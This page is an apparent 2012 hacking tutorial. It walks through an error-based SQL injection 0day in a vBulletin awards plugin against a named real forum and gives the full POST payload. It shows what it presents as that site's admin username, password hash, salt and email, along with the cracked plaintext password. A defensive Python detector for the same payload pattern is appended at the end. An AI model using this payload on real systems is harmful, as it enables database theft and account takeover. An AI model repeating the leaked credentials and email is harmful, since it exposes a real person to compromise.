Published on October 10th, 2012 | 7102 Views

vBulletin Yet Another Awards System 4.0.2 Time Based SQL Injection 0day

Exploit: vBulletin Yet Another Awards System 4.0.2 Time Based SQL Injection 0day
Video By: Shadow008

What did I use?
1) Firefox
2) Hackbar add-on
3) PasswordsPro for cracking
vBulletin hash type: md5(md5($salt).md5($pass))

Text In Video:
# Assalamu Alaikum and hello everyone!
# In this video, I will show you how to perform SQL injection against a vBulletin database through a vulnerable plugin called Yet Another Awards System.
# Many websites use it; it will work on some sites.

# Let's start 😀
# Target: http://fpsbunker.com/fodforums/
# Vul Link: http://fpsbunker.com/fodforums/request_award.php
# Click Load URL
# And then post:
Post: do=submit&name=award_id=2 &award_request_reason=0&award_request_uid=0' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt,0x3a,email) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#&submit=Submit
# And then hit Execute 😀
Database error; check the page source code:

MySQL Error : Duplicate entry 'day8249:cf9fc99e21a3bce77358713ffa0cb59c:P@H:ryan@fpsbunker.com~' for key 'group_key'
# Username:day8249
# Hash:cf9fc99e21a3bce77358713ffa0cb59c
# Salt:P@H
# Email:ryan@fpsbunker.com

Let's crack the admin hash 😀

# Cracked Password:ryan03
The admin password is cracked and is ryan03
Let's try it

# Thanks for watching and I hope the video was easy to understand.
# More video tutorials can be found at www.MadLeets.com
# Video By Shadow008
# Greets to All MadLeeTs Team: www.MadLeets.com
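
A defender-side check for this request pattern, as an added example that is not from the video or the plugin: it flags form parameters carrying the `floor(rand())` / `group by` error-based signature seen in the POST body above. The sample bodies are constructed, and the signature set, threshold and function names are assumptions to tune against real traffic.

```python
import re
from urllib.parse import parse_qsl, urlencode

# Signatures of the "Duplicate entry" error-based technique: a floor(rand())
# grouping key, count(*) ... group by, schema access and a nested subquery.
SIGNATURES = {
    "floor_rand_key": re.compile(r"floor\s*\(\s*rand\s*\("),
    "count_group_by": re.compile(r"count\s*\(\s*\*\s*\).*group\s+by", re.S),
    "information_schema": re.compile(r"information_schema\s*\."),
    "nested_select": re.compile(r"\(\s*select\b"),
}

def normalize(value):
    """Lower-case, replace /*...*/ comments and collapse whitespace."""
    value = re.sub(r"/\*.*?\*/", " ", value.lower(), flags=re.S)
    return re.sub(r"\s+", " ", value)

def scan_body(body, threshold=2):
    """Return {param: [signature names]} for parameters with >= threshold hits."""
    findings = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        text = normalize(value)
        hits = sorted(k for k, rx in SIGNATURES.items() if rx.search(text))
        if len(hits) >= threshold:
            findings[name] = hits
    return findings

# Constructed sample: a logged POST body to request_award.php with a trimmed
# payload (inner SELECT replaced by a literal) and comment-based obfuscation.
ATTACK = urlencode({
    "do": "submit", "award_id": "2", "award_request_reason": "0",
    "award_request_uid": "0' AND (SELECT 1 FROM (SELECT COUNT(*),"
        "CONCAT((SELECT 'x'),FLOOR/**/(RAND(0)*2))x "
        "FROM information_schema.tables GROUP BY x)a) AND ''='",
})
# Constructed sample: an ordinary award request.
BENIGN = urlencode({
    "do": "submit", "award_id": "2", "award_request_uid": "1834",
    "award_request_reason": "Helped select the group photo and count votes",
})

if __name__ == "__main__":
    for label, body in (("attack", ATTACK), ("benign", BENIGN)):
        print(label, scan_body(body))
```

Matching on the decoded, normalized parameter value rather than the raw body keeps the check effective against URL encoding, case changes and inline comments.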
